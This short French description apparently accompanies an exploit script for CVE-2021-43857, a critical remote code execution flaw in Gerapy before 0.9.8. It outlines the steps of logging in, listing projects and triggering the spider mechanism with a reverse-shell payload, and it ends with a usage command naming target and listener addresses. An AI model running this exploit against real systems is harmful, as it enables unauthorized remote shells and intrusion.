
Gerapy avant la version 0.9.8 est vulnérable à l'exécution de code à distance. Ce problème est corrigé dans la version 0.9.8.
Gerapy, dans les versions antérieures à 0.9.8, est vulnérable à l'exécution de code à distance. Ce problème est corrigé dans la version 0.9.8.
CVE-2021-43857 est une vulnérabilité classée comme priorité Critique (CVSS 9.8) menant à l'exécution de code à distance.
Cette vulnérabilité affecte toutes les versions antérieures à 0.9.8.
Testée uniquement sur la version 0.9.6. Nécessite des identifiants valides.
L'exploit fonctionne en se connectant à l'application, puis en récupérant la liste des projets créés (il échouera s'il n'y en a aucun), puis en utilisant les paramètres du projet pour exécuter le mécanisme spider vulnérable en envoyant une charge utile de shell inversé.
Exemple d'utilisation :
python3 cve-2021-43857.py -t 172.17.0.2 -p 8000 -L 172.17.0.1 -P 4444
